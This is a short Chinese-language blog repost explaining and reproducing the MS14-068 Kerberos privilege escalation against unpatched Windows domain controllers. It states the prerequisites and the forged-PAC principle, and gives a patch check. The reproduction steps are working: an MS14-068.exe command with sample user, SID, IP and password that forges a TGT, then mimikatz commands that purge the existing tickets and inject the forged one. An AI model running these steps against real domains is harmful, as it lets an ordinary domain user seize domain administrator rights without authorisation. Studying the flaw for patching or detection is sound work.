域滲透之MS14-068域提權漏洞


域滲透之MS14-68域提權漏洞

漏洞概述

漏洞可能允許攻擊者將未經授權的域用戶賬戶的權限,提權到域管理員的權限。

利用條件

域控機器沒有打MS14-068的補丁(KB3011780)

需要一個域內用戶和域內用戶密碼或hash,域內用戶的suid

漏洞原理

服務票據是客戶端直接發送給服務器,並請求服務資源的。如果服務器沒有向域控dc驗證pac的話,那么客戶端可以偽造域管的權限來訪問服務器

MS14-068漏洞分析:Kerberos協議探索系列之票據篇

Kerberos認證原理

漏洞復現

Ms14-068利用工具

查詢域控機器是否存在該補丁

systeminfo |find "3011780"
C:\Users\douser\Desktop>dir \\192.168.183.130\c$
拒絕訪問。

使用普通用戶權限,測試訪問域控的C盤共享,訪問被拒絕

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
MS14-068.exe -u douser@demo -s S-1-5-21-979886063-111190
0045-1414766810-1107 -d 192.168.183.130 -p Dotest123

這里獲取到一個TGT_douser@demo.com.ccache文件

清空票據

kerberos::purge //清空已有票據

kerberos::list  //查看票據

注入票據

kerberos::ptc TGT_douser@demo.com.ccache

mimikatz 不支持03系統注入


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM